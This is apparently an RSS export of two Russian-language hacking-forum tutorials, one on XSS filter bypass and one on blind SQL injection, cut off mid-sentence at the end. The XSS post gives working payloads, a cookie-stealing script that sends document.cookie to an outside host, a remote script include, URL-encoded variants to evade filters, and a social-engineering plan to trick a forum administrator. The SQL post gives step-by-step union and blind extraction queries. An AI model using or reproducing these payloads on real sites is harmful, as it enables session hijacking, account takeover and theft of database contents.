						&lt;p&gt;Как узнать, что XSS на даном сайте проходит?&lt;/p&gt;
						&lt;p&gt;Ужасна распрастраннёная узявимость типа: &amp;lt;script&amp;gt;alert()&amp;lt;/script&amp;gt; Пытаемся вставить во все различные поля этот скрипт... если вышло сообщение значит скрипт обработался и выполнился. &lt;/p&gt;
						&lt;p&gt;Самая распостраненая XSS (наблюдаеться во всех местах где плохая фильтрация): &amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert()&amp;lt;/script&amp;gt; &lt;br /&gt;Вся суть в &amp;quot;&amp;gt; .&lt;br /&gt;Давайте подумаем, что мы делаем, когда вводим в поле &amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert()&amp;lt;/script&amp;gt; , что происходит? &lt;br /&gt;Мы вводим в форму &amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert()&amp;lt;/script&amp;gt; какой-то переменной присваиваеться значение поля. Переменная обрабатывается, &amp;quot;&amp;gt; выполняеться, закрывает &lt;br /&gt;скрипт и выпролняет &amp;lt;script&amp;gt;alert()&amp;lt;/script&amp;gt; &lt;/p&gt;
						&lt;p&gt;Эта XSS самая распостраненая в поисковиках:&lt;br /&gt;Просматриваем все поля сайта и пытаемся вставить &amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert()&amp;lt;/script&amp;gt; &lt;br /&gt;Если вышло сообщение - вы нашли XSS...&lt;/p&gt;
						&lt;p&gt;### А как определить есть фильтр или нет?&lt;/p&gt;
						&lt;p&gt;Просто в любое поле вводим: &#039;&#039;;!--&amp;quot;&amp;lt;fuck&amp;gt;=&amp;amp;{()}&lt;br /&gt;Дальше открываем html страничку и ищем слово &amp;quot;fuck&amp;quot;&lt;br /&gt;и смотри последующие сиволы.. &lt;/p&gt;
						&lt;p&gt;Если &amp;lt;&amp;gt; так и остались то это перваый признак уязвимости - значит фильтр имеет дырку. &lt;br /&gt;Если ,&amp;quot;&#039;\ символы остались такими, как были введены - это второй признак уязвимости - возможные дополнительные символы к последующей XSS атаке. &lt;br /&gt;Затем, если открыв HTML, вы не обнаружили &amp;lt;&amp;gt; то скорее всего дырка в фильтре. &lt;br /&gt;Если открыв HTML вы обнаружили, что &amp;lt;&amp;gt; заменены на другие символы, то это облом - фильтр по крайней &lt;br /&gt;мере функционирует нормально. &lt;br /&gt;Возможно еще ввести в поле для проверки фильтрации вот так: &amp;quot;&amp;gt;&amp;lt;&amp;gt;&#039;&amp;quot;`,/\?@%&lt;/p&gt;
						&lt;p&gt;Рассмотрим случай если фильтр съедает &amp;lt;&amp;gt; &lt;/p&gt;
						&lt;p&gt;В этом случае существует вероятность дырки. &lt;br /&gt;К примеру, у фильтра условие съедать &amp;lt;script&amp;gt;,&amp;lt;&amp;gt; и . &lt;br /&gt;Тогда пробуем &amp;lt;zxcvbnzxc792&amp;gt; и смотрим, если не съелось - нашли дырку...дальше можно составить боевой XSS-скрипт.&lt;/p&gt;
						&lt;p&gt;Ещe существует метод вложенного скрипта, к примеру вот так: &lt;br /&gt;&amp;lt;sc&amp;lt;script&amp;gt;ript&amp;gt;alert()&amp;lt;/sc&amp;lt;/script&amp;gt;ript&amp;gt; &lt;br /&gt;это, если фильтр не оч. сильный и плохо фильтрует. &lt;/p&gt;
						&lt;p&gt;Еще можно попробовать во так: &lt;br /&gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;lt;&amp;lt;script бывает, что фильтр подсчитывает откр. и закр. скобки и закрывает сам. Сначало фильтрует, а потом закрывает... что дает нам дырку к инъекции скрипта. &lt;/p&gt;
						&lt;p&gt;Частенько бывает что фильтр дополняет скрипт, к примеру вот этим :&lt;br /&gt;http://******.ru/trye.asp?sessionID=&amp;quot;&amp;gt;&amp;lt;IMG%20SRC=&amp;quot;javascript:alert( ); &lt;/p&gt;
						&lt;p&gt;Фильтр смотрит, что ничего опасного в &amp;lt;IMG%20SRC=&amp;quot;javascript:alert(); нет, закрывает и тем самым &lt;br /&gt;выполняя скрипт. &lt;/p&gt;
						&lt;p&gt;Еще конечно если фильтр не фильтрует различные кодировки то можно попытаться закодировать скрипт и вставить код. &lt;/p&gt;
						&lt;p&gt;Все надо пытаться методом проб и ошибок искать...&lt;br /&gt;Пытаться вводить в поля и внимательно просматривать что мы получили от фильтра. &lt;br /&gt;Методом тыков понять, как фильтр работает, есть ли у него недоработки. &lt;br /&gt;Если фильтр плохой, мы всегда можем вставить скрипты.&lt;/p&gt;
						&lt;p&gt;### Активные XSS&lt;/p&gt;
						&lt;p&gt;Тут надо использовать разрешенные теги и прекрываясь ими, надо выполнить запрос. &lt;/p&gt;
						&lt;p&gt;Например, теги url,bb,img. &lt;br /&gt;Весь смысл вставки заключается в том, что нам надо встроить запрос в париметр img или url. У Img есть много парметров кроме src и alt.&lt;br /&gt;Этот баг очень часто используется на форуме, в гостевухах...&lt;/p&gt;
						&lt;p&gt;Рассмотрим активные XSS.&lt;/p&gt;
						&lt;p&gt;Предупреждения!!!&lt;br /&gt;еги [fon*t],[im*g],[ur*l] пишутса с * для того, штобы они не использовались данным форумом.&lt;br /&gt;Для использувания этих тегов удалите *. &lt;/p&gt;
						&lt;p&gt;К примеру просмотрим форум на наличие использования тегов [fon*t],[im*g],[ur*l] и попытаться вставить в них скрипт или комбинировать их.:&lt;/p&gt;
						&lt;p&gt;[im*g]httр://www.qwewqw.ru/1.jpg[/im*g] Выходит крестик...значит img используется и мы его подобрали (просто дело в том, что бывает img включен, а админы из создания сообщения его убирают, мол картинки вставлять нельзя и бывает он в использовании &lt;br /&gt;разной формы) если крестика нет...а висит всего надпись, то попробуйте еще так: &lt;br /&gt;[im*g src=httр://www.qwewqw.ru/1.jpg]&lt;/p&gt;
						&lt;p&gt;Ну так вот к примеру мы добились крестика этим:&lt;br /&gt;[im*g]httр://www.qweqw.ru/1.jpg[/im*g]&lt;/p&gt;
						&lt;p&gt;Проверим держит ли фильтр пробел, добавляем пробел после расширения jpg :&lt;br /&gt;[im*g]httр://www.qweqw.ru/1.jpg [/im*g] &lt;br /&gt;если крестик есть - тогда всё ОК.&lt;/p&gt;
						&lt;p&gt;Далее существуют у img параметры dynsrc и lowsrc которые держат яваскрипт. Пытаемся к примеру вставить: &lt;br /&gt;[im*g]http://www.qwewqw.ru/1.jpg dynsrc=javascript:alert()[/im*g] &lt;br /&gt;проверяем, отсылаем - появиться сообщение - значит нашли активную XSS и вместо alert() можете вставить любой скрипт. &lt;/p&gt;
						&lt;p&gt;Если фильтр не сдался попробуйте так: &lt;br /&gt;[im*g]http://www.qweqw.ru/&amp;quot;/dynsrc=&amp;quot;javascript:alert()&amp;quot;/1.jpg[/im*g]&lt;br /&gt;и &lt;br /&gt;[im*g]http://www.qwewqw.ru/&amp;quot;/dynsrc=javascript:alert()/1.jpg[/im*g]&lt;/p&gt;
						&lt;p&gt;Если с приведённых примеров получился крестик, то httр://www.qweqw.ru/1.jpg заменяем на адрес сниффера.&lt;/p&gt;
						&lt;p&gt;Бывают случаи, когда jpg отключен админом.&lt;/p&gt;
						&lt;p&gt;###Мы всё время делали коды типа:&lt;/p&gt;
						&lt;p&gt;&amp;lt;script&amp;gt;alert(&#039;HakNet&#039;)&amp;lt;/script&amp;gt;&lt;br /&gt;javascript:alert(&#039;HakNet&#039;)&lt;br /&gt;javascript:alert(&#039;HakNet&#039;)/1.jpg и так далие..&lt;br /&gt;Но они никакой пользы не принесли, это просто коды для проверки(тестировки) на Xss.&lt;/p&gt;
						&lt;p&gt;Вот скрипт:&lt;br /&gt;&amp;lt;script&amp;gt;&lt;br /&gt;img = new Image();&lt;br /&gt;img.src = &amp;quot;http://antichat.org/s/HakNet.gif?&amp;quot;+document.cookie;&lt;br /&gt;&amp;lt;/script&amp;gt;&lt;br /&gt;Он уже ворует куки =)&lt;/p&gt;
						&lt;p&gt;###Как его подставить к ссылке с Xss?&lt;/p&gt;
						&lt;p&gt;Да очень легко...&lt;br /&gt;Есть несколко вариантов:&lt;br /&gt;- 1)делаем вот так:&lt;br /&gt;http://*****.ru/free?p=&#039;&amp;gt;&amp;lt;script&amp;gt;img=new Image();img.src=&amp;quot;http://antichat.org/s/HakNet.gif?&amp;quot;+document.cookie;&amp;quot;+document.cookie;&amp;lt;/script&amp;gt;&lt;br /&gt;где **** сайт с Xss.&lt;/p&gt;
						&lt;p&gt;Вот сам составленый скрипт:&lt;br /&gt;&#039;&amp;gt;&amp;lt;script&amp;gt;img = new Image();img.src=&amp;quot;http://antichat.org/s/HakNet.gif?&amp;quot;+document.cookie;&amp;lt;/script&amp;gt;&lt;/p&gt;
						&lt;p&gt;- 2)Можно ещё делать вот так:&lt;br /&gt;http://*****.ru/free?p=&#039;&amp;gt;&amp;lt;script src=http://haknet.h16.ru/script/js.js&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;где обращаетса к &lt;a href=&quot;http://haknet.h16.ru/script/js.js&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://haknet.h16.ru/script/js.js&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;а в js.js есть:&lt;br /&gt;img=new Image();img.src=&amp;quot;http://antichat.org/s/HakNet.gif?&amp;quot;+document.cookie;&lt;br /&gt;этот способ более надёжен.&lt;/p&gt;
						&lt;p&gt;Но как я уже писал - иногда бывают затруднения с фильтрами на сайте (не прокатывает наш скрипт).&lt;br /&gt;Тогда нужно подумать, как его обойти.&lt;br /&gt;Можно просто нечто добавить, нечто поменять, или удалить в скрипте.&lt;br /&gt;Но есть более надёжным вариант, когда мы просто закодируем скрипт. Для этого есть много прог. &lt;br /&gt;Есть такой сайт как &lt;a href=&quot;http://ha.ckers.org/xss.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://ha.ckers.org/xss.html&lt;/a&gt; (кодировщик-дэкодировщик).&lt;/p&gt;
						&lt;p&gt;Вот пример:&lt;br /&gt;%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E&lt;/p&gt;
						&lt;p&gt;это был закодированный:&lt;/p&gt;
						&lt;p&gt;http://*****.ru/free?p=&#039;&amp;gt;&amp;lt;script src=http://haknet.h16.ru/script/js.js&amp;gt;&amp;lt;/script&amp;gt;&lt;/p&gt;
						&lt;p&gt;- 3) Особенно шифрование необходимо не только для обмана фильтров, но и для обмана АДМИНА при использовании ПАССИВНОЙ ХСС.&lt;/p&gt;
						&lt;p&gt;Вот такой пример на основе социальной инженерии.&lt;br /&gt;Ищем контакт с админом форума бросаем в форуме ему линк на свой сайт, и говориш типа так &amp;quot;клевая фича есть на сайте&amp;quot; и так дале в том же духе. &lt;br /&gt;А на нашем сайте будет как вы уже догадались =) вот ето скрипт:&lt;/p&gt;
						&lt;p&gt;&amp;lt;script language=&amp;quot;JavaScript&amp;quot;&amp;gt; &lt;br /&gt;document.location.href=&amp;quot;%68%74%74%70%3A%2F%2F%2A%2 A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E&amp;quot; &lt;br /&gt;&amp;lt;/script&amp;gt;&lt;/p&gt;
						&lt;p&gt;Что делает document.location.href вы спросите меня? )).. это ява-код, который без запроса переходит на указаной сайт Так чо ж у нас получается, дали мы линк админу, и он зашел на наш сайт, вот что делается.. его быстро бросает на&lt;/p&gt;
						&lt;p&gt;%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E&lt;br /&gt;а это уже и есть наш Xss в зашифрованом виде.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;Примечание: это подействует только тогда, когда Xss будет принадлежать админу сайта которому вы бросили линк... &lt;br /&gt;Иными словами ТРУДНОСТЬ ПАССИВНОЙ ХСС состоит в том, что уязвимость может быть использована ТОЛЬКО, если жертва АВТОРИЗОВАНА на уязвимом сайте!!!&lt;/span&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (AfeR)</author>
			<pubDate>Mon, 20 Oct 2008 10:23:03 +0400</pubDate>
			<guid>http://cah.hitbb.ru/viewtopic.php?pid=6#p6</guid>
		</item>
		<item>
			<title>SQL Injection</title>
			<link>http://cah.hitbb.ru/viewtopic.php?pid=5#p5</link>
			<description>&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;[into]&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Прежде всего, я хочу сказать спасибо большенству авторов статей про blind sql injection, за то, что они не могут объяснить и раскрыть тему с нуля, а втирают только про запутанные и никому не нужные функции, хоть и правильные, но безтолковые, я пишу статью для тех, кого интересует ответы на вечные вопросы... а одним из них является обход union&#039;а в запросах. Чтобы хорошо усвоить все, я рекомендую вам свою статью по sql injection &lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;http://forum.whack.ru/showthread.php?t=193&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;[немного из истории]&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;многие из нас знают про существование sql injection древнейший баг, многие люди искали эффективную защиту, усложняя жизнь взломщикам, одним из средств защиты является отрезание работоспособности необходимых функций, для этого взломщики приспособились к blind sql injection... Баг тоже не очень то и молодой... Принцип атаки тот же, только немного геморнее... Поехали к делу...&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;[Осмотр местности]&lt;/span&gt;&lt;br /&gt;для начала нам нужно узнать присутствует ли баг в скрипте, который обращается к бд... Имеем такой скрипт&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=10&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;ставим кавычку&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=10&#039;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;если есть ошибка работы с базой данных, то есть вероятность о наличии sql инъекции&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=11-1&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;если будет аналогично что и&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=10&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;то это тоже скорее всего sql injection&lt;br /&gt;если&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=10+order+by+1--&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;ошибки нет а при&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=10+order+by+100000000--&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;ошибка есть то это sql injection .&lt;br /&gt;далее мы подобрали поля&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=10+union+select+1,2,3,4,5,6--&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;но выводимые поля отсутствуют или вообще ничего нет, то тогда надо прибегнуть к попытке проведения blind sql injection&lt;br /&gt;[Необходимые функции]&lt;br /&gt;substring(1,2,3) - Это нам выдаст подстроку длиной 3 из строки 2 начиная с первой позиции&lt;br /&gt;ascii - возращает нам значение из таблицы ascii &lt;br /&gt;lower - все буквы будут переведены в нижний регистр, эта функция пригодится нам для удобства&lt;br /&gt;к примеру &lt;br /&gt;SELECT LOWER(&#039;ZXCVB&#039;);&lt;br /&gt;вернет нам &#039;zxcvb&#039;&lt;br /&gt;обзор функций закончен идем дальше&lt;br /&gt;[Практическое применение]&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=11+AND+ascii(lower(substring(user(),1,1)))&amp;gt;97&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;запрос дал нам положительный результат, то есть выдалась страница что и &lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=11&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;это означает, что в ascii наш первый символ из user() находится под номером &amp;gt;97 &lt;br /&gt;идем дальше&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=11+AND+ascii(lower(substring(user(),1 ,1)))&amp;gt;115&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;выдает нам отрицательный результат то есть не тоже самое что при простом id=11&lt;br /&gt;значит в ascii наш символ находится &amp;lt;115&lt;br /&gt;далее &lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=11+AND+ascii(lower(substring(user(),1,1)))&amp;gt;106&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;результат положительный, символ в ascii &amp;gt;106&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=11+AND+ascii(lower(substring(user(),1,1)))&amp;gt;108&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;результат отрицательный&lt;br /&gt;вот наш символ в таблице находится 106 и 108 включительно, так как у нас знак &amp;gt; о равенстве тут речи не идет&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=11+AND+ascii(lower(substring(user(),1,1)))=106&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;результат отрицательный&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=11+AND+ascii(lower(substring(user(),1,1)))=107&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;результат отрицательный&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=11+AND+ascii(lower(substring(user(),1,1)))=108&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;результат положительный то есть выдалось нам тоже самое что и при id=11&lt;br /&gt;первый символ из имени юзера имеет номер в ascii 108 это буква &amp;quot; l &amp;quot; (L) так как используется lower если это скажется неблаготворно на посимвольном&lt;br /&gt;подборе, нам придется обойтись без её использования, так как мы теряем заглавные буквы, но в данный момент нет.&lt;br /&gt;второй символ узнается таким же способом&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=11+AND+ascii(lower(substring(user(),2,1)))&amp;gt;1&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;результат положительный&lt;br /&gt;итд мы дошли до 97&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=11+AND+ascii(lower(substring(user(),2,1)))=97&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;результат положительный значит наш символ в таблице ascii - 97 то есть буква a &lt;br /&gt;далее&lt;br /&gt;третий символ&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=11+AND+ascii(lower(substring(user(),3,1)))&amp;gt;1&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;результат положительный значит есть третий символ в имени&lt;br /&gt;мы его таким же способом и подобрали&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=11+AND+ascii(lower(substring(user(),3,1)))=109&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;результат положительный итак наш третий символ в ascii имеет номер 109 то есть m&lt;br /&gt;четвертый символ&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=11+AND+ascii(lower(substring(user(),4,1)))&amp;gt;1&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;результат отрицательный, значит четвертого символа нету&lt;br /&gt;и имя нашего юзера : lam&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;[Названия таблиц и столбцов]&lt;/span&gt;&lt;br /&gt;Мне известны три способа&lt;br /&gt;если пашет union но не выводит полей, то этим можно воспользоваться&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=10+union+select+1,2,3,4,5,6--&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;мы подобрали поля ошибки нет&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=10+union+select+1,2,3,4,5,6+from+user--&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;выода нет&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=10+union+select+1,2,3,4,5,6+from+users--&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;вывелся результ что и при id=10&lt;br /&gt;значит таблица есть поля аналогично что и при обычной sql inj&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=10+union+select+1,2,user,4,5,6+from+users--&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;результат отрицательный&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=10+union+select+1,2,username,4,5,6+from+users--&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;результат положительный, значит username такой столбец есть в таблице.&lt;br /&gt;тут ясно&lt;br /&gt;второй способ&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=10+natural+left+join+user&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;результат отрицательный значит таблицы user нет&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=10+natural+left+join+users&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;ошибки нет, значит таблица существует&lt;br /&gt;третий способ&lt;br /&gt;прямо в слепой инъекции&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=1+AND+ascii(lower(substring((SELECT+1+from mysql.user+LIMIT+1),1,1)))&amp;gt;1&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;если таблица mysql.user 